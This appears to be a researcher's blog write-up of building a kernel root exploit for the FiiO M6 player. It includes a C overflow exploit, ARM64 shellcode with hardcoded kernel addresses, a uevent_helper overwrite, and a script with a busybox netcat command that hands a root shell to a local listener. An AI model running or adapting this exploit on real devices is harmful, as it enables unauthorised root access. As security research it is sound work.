Overview:
A little over a month ago, I wrote a blog post detailing how I found a kernel vulnerability in the FiiO M6 Hi-Fi MP3 player. I would recommend reading that post first, but to recap:
- The device is Android-based, running a version 3.18 AArch64 Linux kernel
- The
ftxxxx-debug
entry in procfs has a write-handler which suffers from a straight forward stack-overflow. It reads an arbitrary amount of user-controlled data into a fixed size kernel buffer using thecopy_from_user
function
Having never done any kernel exploit dev, the thought of turning this bug into a weaponized privilege escalation initially felt out of the picture. However, upon further consideration, I realized this was essentially the “Hello World” of Linux exploitation on a real-world device; if I was gonna find an entry point into the field, this might as well be it. What followed was 30 days filled with reading, learning, and a LOT of waiting for the device to reboot after crashing. The remainder of this post will cover the technical details of the successful exploit, skimming over the extensive trial and error which took place. I may include a part 3 post or video recapping and reflecting on the project and going more in-depth on the learning process.
TL;DR:
The device does not have any stack canaries, so our overflow allows us to directly overwrite the saved x30
return pointer. While SMAP/SMEP are enabled, the kernel stack is marked as executable and KASLR is disabled. At the time of our overflow, register x21
always holds a pointer to somewhere in the kernel stack, which contains our user-controlled data. We can use the gadget blr x21
to jump to custom shellcode included in the overflow payload. Our shellcode performs a “HotPlugEater” attack, in which uevent_helper
is overwritten to point to an attacker-controlled script, executing the malicious payload with root permissions. While there are numerous more “standard” ways to achieve the same effect once obtaining control over PC
, the inability to do any kernel debugging and the lack of ARM64 Linux kernel exploitation resources presented significant hurdles.
Picking Up Where We Left Off:
Finding the Offset To The Saved Return Pointer:
At the end of the previous post, I released a Crash PoC for the vulnerability. It has been included again below:
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
use std::io::{Read, Write, stdin, stdout};
use std::fs::OpenOptions;
fn main() {
// create our long payload
let mut buf = vec![0x41u8; 32 * 1024];
println!("{}", buf.len());
// open /proc/ftxxxx-debug for writing
let path = "/proc/ftxxxx-debug";
let fd = OpenOptions::new().write(true).open(path);
print!("Writing {:?}\n", path);
if let Ok(mut fd) = fd {
let fuzz_size = buf.len();
let _ = fd.write(&buf[..fuzz_size]); }
}
For this proof-of-concept code, I chose an arbitrarily long buffer (32 * 1024 bytes) which I knew would cause a crash. However, after confirming there were no stack canaries, the first step for the exploit was to determine the offset to the saved link register (x30
). At the end of each function call in ARM64, this saved value is popped back off the stack into x30
. Upon encountering a RET
instruction, the program loads the value of x30
into the PC
.
To determine the offset, I manually created random payloads and then checked what the PC
value was in the kernel crash. After a few attempts, I was able to determine that the offset was 1024 bytes. As such, we can update the crash PoC to have the following payload:
1
2
3
4
5
// ... previous code ...
let mut buf = vec![0x41u8, 8 * 128]; // 1024 bytes of junk 0x41s
let mut buf1 = vec![0x42u8, 8]; // 8 bytes of 0x42, overwriting our saved x30 address
buf.append(&mut buf1);
// ... previous code ...
Reviewing the kernel panic now, the PC
is filled with our 8 0x42
s, indicating that we have successfully found the offset to the saved x30
value and can redirect program execution.
Obtaining the Kernel Symbols:
The next step of the process was to obtain kernel symbols. While our shell
user does have read permissions to /proc/kallsyms
, kptr_restrict
is set to 2 and thus all the addresses are shown as 0.
After a bit of digging, I found a GitHub repo dedicated to extracting symbols from ARM64 Android Kernel images. I was able to obtain the firmware for the FiiO M6 directly from their website. Extracting the provided zip file was enough to obtain the kernel image individually. Using it with the script from GitHub, we can dump all the kernel symbols! Since there’s no KASLR, these are static values which we can hardcode into our exploit.
Kernel Debugging?
Since this was my first kernel exploit ever, I was really hoping to get some form of a debug set-up working. I assumed the contents inside the FiiO firmware package would be enough to get an emulated kernel up and running. However, after a week of attempting, I had made no progress. I am still fairly confident it can be done, but I couldn’t figure it out and didn’t want to spend any more time on it. I switched gears a bit and tried to patch the bootloader to root the device, but this also proved unsuccessful. I decided to proceed with no debugging capabilities, and return only if I couldn’t figure out how to craft an exploit without them.
Exploitation:
Initial Strategy:
Now that we have kernel symbols and the ability to redirect program execution, it’s time to come up with an exploit strategy. After a few days of learning about Linux privesc exploit techniques, I decided that using the classic commit_creds(prepare_kernel_cred(NULL))
path would probably be best. You can learn more about this privesc strategy here but the quick summary is:
prepare_kernel_cred
creates a root-privileged cred when called with a NULL argumentcommit_creds
takes a pointer to a cred structure, and sets the current process to have that privilege level
Therefore, commit_creds(prepare_kernel_cred(NULL))
sets the process’s privilege level to root. After that, we just return execution out of kernel mode and back to our userland process.
Surely The Stack Isn’t Executable, Right…?
With our exploit strategy in mind, I set out to write a ROP chain. There are almost no publicly available resources on ARM64 kernel ROP, but I was able to find some useful posts about userland exploitation, such as a post from Perfect Blue and a talk from Billy Ellis.
As the architecture expands in popularity, maybe one day we will see more write-ups on the subject. Today, however, is not that day. About midway through struggling to craft and debug a proper ROP chain, I spotted something interesting. The x21
register pointed to an area on the stack which we could overflow with anything we wrote after overwriting the saved x30
value. For example, we can use the following code:
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
uint64_t fake_ret_addr = 0x4242424242424242ULL;
uint64_t x21_overflow = 0x4343434343434343ULL;
static int exploit() {
int fd;
fd = open("/proc/ftxxxx-debug", O_RDWR);
unsigned char buf[4096];
memset(buf, 0x41, 1);
memset(buf+1, 0x0, 1023);
uint64_t *chain = (uint64_t *)&buf[1024];
*chain++ = (uint64_t)fake_ret_addr;
*chain++ = (uint64_t)x21_overflow;
*chain++ = (uint64_t)x21_overflow;
*chain++ = (uint64_t)x21_overflow;
*chain++ = (uint64_t)x21_overflow;
*chain++ = (uint64_t)x21_overflow;
*chain++ = (uint64_t)x21_overflow;
*chain++ = (uint64_t)x21_overflow;
*chain++ = (uint64_t)x21_overflow;
*chain++ = (uint64_t)x21_overflow;
*chain++ = (uint64_t)x21_overflow;
*chain++ = (uint64_t)x21_overflow;
*chain++ = (uint64_t)x21_overflow;
write(fd, buf, 4096);
return 0;
}
And now reviewing the crash logs, we can see that x21
holds our 0x43
s
I had been under the assumption that the stack was not executable, but I decided there was no harm putting this belief to the test. I used ropper
to find a blr x21
gadget and overwrote the saved x30
with it. This would redirect code execution to the pointer stored in x21
.
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
uint64_t kernel_base = 0xFFFFFFC000080000ULL;
uint64_t blr_x21 = 0x000000000001e664ULL + kernel_base;
// ... previous code ...
uint64_t *chain = (uint64_t *)&buf[1024];
*chain++ = (uint64_t)blr_x21;
*chain++ = (uint64_t)x21_overflow;
*chain++ = (uint64_t)x21_overflow;
*chain++ = (uint64_t)x21_overflow;
*chain++ = (uint64_t)x21_overflow;
*chain++ = (uint64_t)x21_overflow;
*chain++ = (uint64_t)x21_overflow;
*chain++ = (uint64_t)x21_overflow;
*chain++ = (uint64_t)x21_overflow;
*chain++ = (uint64_t)x21_overflow;
*chain++ = (uint64_t)x21_overflow;
*chain++ = (uint64_t)x21_overflow;
*chain++ = (uint64_t)x21_overflow;
*chain++ = (uint64_t)x21_overflow;
*chain++ = (uint64_t)x21_overflow;
*chain++ = (uint64_t)x21_overflow;
*chain++ = (uint64_t)x21_overflow;
*chain++ = (uint64_t)x21_overflow;
*chain++ = (uint64_t)x21_overflow;
*chain++ = (uint64_t)x21_overflow;
*chain++ = (uint64_t)x21_overflow;
*chain++ = (uint64_t)x21_overflow;
*chain++ = (uint64_t)x21_overflow;
*chain++ = (uint64_t)x21_overflow;
*chain++ = (uint64_t)x21_overflow;
If the stack was executable, this address would then be deference and our junk data would be interpreted as code. It’s at least seemed worth a shot…
We can see above that our PC
value and x21
value are the same, indicating that our ROP chain seems to have executed properly. We also get the following line from the end of the kernel panic:
This error message seems to indicate that our 0x43
s are being interpreted as valid instructions, but it’s still hard to tell. Maybe the error message is just a fluke?
I changed the entire chain to be NOPs, except the last line, which was still our x21_overflow
junk data.
1
2
3
4
5
6
7
8
9
10
11
12
13
14
uint64_t nop = 0xd503201fd503201f;
// ... previous code ...
uint64_t *chain = (uint64_t *)&buf[1024];
*chain++ = (uint64_t)blr_x21;
*chain++ = (uint64_t)nop;
*chain++ = (uint64_t)nop;
*chain++ = (uint64_t)nop;
*chain++ = (uint64_t)nop;
// ... continue chain
*chain++ = (uint64_t)nop;
*chain++ = (uint64_t)x21_overflow;
If the code on the stack was actually executing, it would go down the NOP sled before throwing the same error. Furthermore, our PC would now point to a different address than x21
, since it successfully executed instructions.
I was honestly in disbelief that this worked. We now have a very simple gadget which reliably allows us to jump to our own shellcode, executing in supervisor mode (EL1).
Writing The Shellcode:
The obvious next step was to come up with our shellcode. In order to do that, we need to grab the addresses for both commit_creds
and prepare_kernel_cred
After that, we can start putting together some ARM64 assembly:
mov x0, xzr // move 0x0 into x0
mov x2, #0x6368 // mov addr of prepare_kernel_cred into x2
movk x2, #0x000b, lsl #16
movk x2, #0xffc0, lsl #32
movk x2, #0xffff, lsl #48
blr x2 // branch to addr in x2
mov x4, #0x5ffc // mov addr of commit_creds into x4
movk x4, #0x000b, lsl #16
movk x4, #0xffc0, lsl #32
movk x4, #0xffff, lsl #48
blr x4 // branch to addr in x4
...
This code works as follows:
- Move 0x0 into
x0
. ARM64 specifies thatx0
will always hold the first argument when a function is called. We want the argument passed toprepare_kernel_cred
to be NULL, which is equivalent to 0x0 - Load the address of
prepare_kernel_cred
intox2
and branch to it - The return value of
prepare_kernel_cred
is a pointer to the newly created credential. ARM64 specifies that all return values will be passed back to the callee inx0
. This works out for us, because the next step is to callcommit_creds
with a pointer to our cred argument inx0
. Thus we don’t have to do anything whenprepare_kernel_cred
returns - Load the address of
commit_creds
intox4
and branch to it.
After this, we need to switch out of supervisor mode and cleanly return to userland. This is where things became significantly less straightforward. A few things need to happen:
- We need to specify what address to return to
- We need to restore the userland stack pointer
- We need to set saved program status registers
The good news is that because x21
consistently holds a pointer into our user-controlled data, we can pass a userland stack pointer and userland return value via our buffer overflow payload.
To debug this, we will compile the above shellcode which doesn’t yet return from supervisor mode. We will make the last instruction 0x41414141
, causing a kernel panic and allowing us to dump the register states. Our exploit payload will include a bogus stack pointer and the address of the function we wish to return to. We can then review the kernel panic logs in order to determine the offsets and finish out our shellcode. In all, our exploit functions look as follows:
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
#include <stdio.h>
#include <string.h>
#include <stdlib.h>
#include <iostream>
#include <fcntl.h>
#include <unistd.h>
#include <sys/stat.h>
#include <sys/types.h>
#include <unistd.h>
#include <sys/mman.h>
#include <sys/types.h>
#include <sys/wait.h>
#include <spawn.h>
uint64_t kernel_base = 0xFFFFFFC000080000ULL;
uint64_t blr_x21 = 0x000000000001e664ULL + kernel_base;
uint64_t nop = 0xd503201fd503201f;
uint64_t junk = 0x4242424242424242ULL;
static int win() {
puts("[+] Returned from supervisor mode\n");
char *argv[] = { "busybox1.11", "touch", "/data/local/tmp/test.txt", NULL };
char *envp[] = { NULL };
puts("[!] Win\n")
execve("/system/bin/busybox1.11", argv, envp);
return 0;
}
static int exploit() {
int fd;
fd = open("/proc/ftxxxx-debug", O_RDWR);
unsigned char buf[4096];
memset(buf, 0x41, 1);
memset(buf+1, 0x0, 1023);
uint64_t stack_size = 0x1000;
void *stack_base = mmap(NULL, stack_size, PROT_READ | PROT_WRITE, MAP_PRIVATE | MAP_ANONYMOUS | MAP_STACK, -1, 0);
if(stack_base == MAP_FAILED) {
puts("[!] mmap failed!");
return -1;
}
void *stack_top = (void *)((uint64_t)stack_base + stack_size);
printf("[+] Stack Pointer: %llx\n", (uint64_t)&stack_top);
printf("[+] win() address: %llx\n", (uint64_t)&win);
unsigned char shellcode[] = {
0xe0, 0x03, 0x1f, 0xaa, 0x02, 0x6d, 0x8c, 0xd2,
0x62, 0x01, 0xa0, 0xf2, 0x02, 0xf8, 0xdf, 0xf2,
0xe2, 0xff, 0xff, 0xf2, 0x40, 0x00, 0x3f, 0xd6,
0x84, 0xff, 0x8b, 0xd2, 0x64, 0x01, 0xa0, 0xf2,
0x04, 0xf8, 0xdf, 0xf2, 0xe4, 0xff, 0xff, 0xf2,
0x80, 0x00, 0x3f, 0xd6,
0x41, 0x41, 0x41, 0x41, // Bad Instruction to cause kernel panic
};
uint64_t *chain = (uint64_t *)&buf[1024];
*chain++ = (uint64_t)blr_x21;
*chain++ = (uint64_t)junk;
*chain++ = (uint64_t)junk;
*chain++ = (uint64_t)junk;
*chain++ = ((uint64_t)&win);
*chain++ = (uint64_t)((uint64_t)&stack_top);
*chain++ = (uint64_t)nop;
*chain++ = (uint64_t)nop;
*chain++ = (uint64_t)nop;
*chain++ = (uint64_t)nop;
*chain++ = (uint64_t)nop;
*chain++ = (uint64_t)nop;
*chain++ = (uint64_t)nop;
*chain++ = (uint64_t)nop;
*chain++ = (uint64_t)nop;
*chain++ = (uint64_t)nop;
*chain++ = (uint64_t)nop;
*chain++ = (uint64_t)nop;
*chain++ = (uint64_t)nop;
*chain++ = (uint64_t)nop;
*chain++ = (uint64_t)nop;
*chain++ = (uint64_t)nop;
*chain++ = (uint64_t)nop;
*chain++ = (uint64_t)nop;
memcpy(buf + 1216, shellcode, sizeof(shellcode));
puts("[+] Ropping to shellcode...");
write(fd, buf, 1024 + 1216 + sizeof(shellcode));
return 0;
}
int main() {
std::cout << "[+] Starting trigger...\n";
exploit();
return 0;
}
Running it, we get a kernel panic as expected.
Lets break down the kernel crash logs. First of all, we see that x0
is equal to 0x0
. This is what we want to see - commit_creds
returns a 0 if completed execution without issue, so we can take this as an indicator that our shellcode was able to successfully execute. Also note that x21
is equal to 0xffffffc01521fec8
.
Scrolling down, the crash dump gives us the data where x21
is currently pointing. Note that data before and after the actual pointer is shown (x21
is pointing at the fec8
line).
We can note that our win()
address (0x0000000078942300
) is stored at x21 - 0x80
. The next 8 bytes are our bogus stack pointer which we mmapped
before the payload. With this information, we can finish out our shellcode to return to usermode:
// ... previous code ...
sub x2, x21, #0x80 // store pointer to win address in x2
ldr x1, [x2] // deref pointer into x1. x1 now holds win() address
ldr x4, [x2, #0x08] // deref pointer+0x8 into x4. x4 now holds fake stack pointer
mov x0, xzr // move 0 into x0
MSR SP_EL0, x4 // set EL0 (usermode) stack pointer to x4
MSR ELR_EL1, x1 // set EL1 (kernelmode) return address to x1
MSR SPSR_EL1, x0 // set status regs to 0x0
ERET
Game over, right?
Not quite. We do successfully return from supervisor mode with our elevated privs. However, as soon as we try to make another syscall, the program segfaults. The device itself doesn’t crash, but our program stops running. Because we did elevate our privs on the process itself, we have root for a nanosecond, but we can’t even do anything interesting with it.
I spent over a week trying to debug this issue (which looking back on it, was way too much time). The segfault almost certainly stemmed from the ugly way the shellcode ERET
back to userspace without taking into account the previous state, the call stack, or any other information. I tried numerous techniques to save / restore the state and jump to different areas of my code, but nothing seemed to work. Being so close to having a root shell, I was reluctant to step back and try a different approach. But after officially running out of ideas, I went back to the drawing board.
Back To The Drawing Board:
To recap, we currently have the following:
- Read, write, and execute primitives in EL1 (supervisor mode)
- The ability to return from supervisor mode without crashing the kernel, but without being able to make another syscall or fork our current process.
With this information, I went to Google and started poking around. I should also shout out some friends in one of my private exploit dev discords who provided a few suggestions. In the end, however, it was a random slidedeck from 2016 which gave the breakthrough.
The HotplugEater Attack:
This presentation by dong-hoon you presented a technique he called the HotplugEater Attack. I have included the relevant slide below:
The idea is as follows:
- The global variable
uevent_helper
points to a script which the kernel uses on a hotplug event. - If we can overwrite this variable to point to an attacker controlled script, it will execute with root permissions.
- Simply changing the variable is enough to trigger the
kobject_uevent_env
function, which will in turn call our malicious script.
Putting It All Together:
We can dump the address of uevent_helper
with the Python script we used earlier.
Our new exploit will now work as follows:
- Create a script in
/data/local/tmp/
which we want to execute with root permissions - Trigger our overflow on
ftxxxx-debug
and ROP to our shellcode - The shellcode will overwrite
uevent_helper
with the path to our malcious script in/data/local/tmp
, return to usermode, and gracefully exit (by way of segfaulting). - After ~10 seconds, the kernel will execute our script
With this in mind, we need to write some new shellcode which performs the actions outlined in point number 3. That shellcode has been included and commented below:
mov x2, #0xc7c8 // move the address of `uevent_helper` into x2
movk x2, #0x00c2, lsl #16
movk x2, #0xffc0, lsl #32
movk x2, #0xffff, lsl #48
mov w3, #'/' // store the value `/data/local/tmp/cmd` byte by byte at x2
strb w3, [x2]
mov w3, #'d'
strb w3, [x2, #1]
mov w3, #'a'
strb w3, [x2, #2]
mov w3, #'t'
strb w3, [x2, #3]
mov w3, #'a'
strb w3, [x2, #4]
mov w3, #'/'
strb w3, [x2, #5]
mov w3, #'l'
strb w3, [x2, #6]
mov w3, #'o'
strb w3, [x2, #7]
mov w3, #'c'
strb w3, [x2, #8]
mov w3, #'a'
strb w3, [x2, #9]
mov w3, #'l'
strb w3, [x2, #10]
mov w3, #'/'
strb w3, [x2, #11]
mov w3, #'t'
strb w3, [x2, #12]
mov w3, #'m'
strb w3, [x2, #13]
mov w3, #'p'
strb w3, [x2, #14]
mov w3, #'/'
strb w3, [x2, #15]
mov w3, #'c'
strb w3, [x2, #16]
mov w3, #'m'
strb w3, [x2, #17]
mov w3, #'d'
strb w3, [x2, #18]
mov x3, xzr // terminate our string with a null byte by moving 0x0 into x3 and storing x3 at x2 + 19
str x3, [x2, #19]
sub x2, x21, #0x80 // ret to our win() function the same way we did in the previous shellcode
ldr x1, [x2]
ldr x4, [x2, #0x08]
mov x0, xzr
MSR SP_EL0, x4
MSR ELR_EL1, x1
MSR SPSR_EL1, x0
ERET
We can create an exploit bash script which does the following:
1
2
3
4
5
6
7
8
9
10
11
12
13
!/system/bin/sh
echo "[+] Creating malicious script at /data/local/tmp/cmd..."
echo "#!/system/bin/sh" >> /data/local/tmp/cmd
echo "/system/bin/busybox1.11 nc 127.0.0.1 4444 -e /system/bin/sh" >> /data/local/tmp/cmd
chmod 777 cmd
echo "[+] Starting exploit..."
/data/local/tmp/poc 2>/dev/null
sleep 5
echo "[+] Launching listener..."
echo "[!] Wait for r00t shell..."
/system/bin/busybox1.11 nc -lp 4444
This script will create a new bash file at /data/local/tmp
named cmd
, which lines up with our shellcode. cmd
’s only function is to forward a shell to a localhost listener on port 4444.
The script then runs our exploit code, which will overwrite the uevent_helper
variable to point at our cmd
file. Finally, we launch a listener on port 4444 waiting for the kernel to execute the cmd
file, giving us a root shell.
The full exploit code can be found on my GitHub.
Next Steps:
While this project is pretty much over, the last thing I would love to do is pack the exploit into an APK and give users the ability to root their device.
I also have some other Android based devices laying around the house, such as the HiSense Touch and the Onyx Pocket 2. This project has been a ton of fun, so maybe I will pick one of those to target in the future.
If you enjoyed this post and want to stay up to date on my future research projects, feel free to give me a follow on Twitter.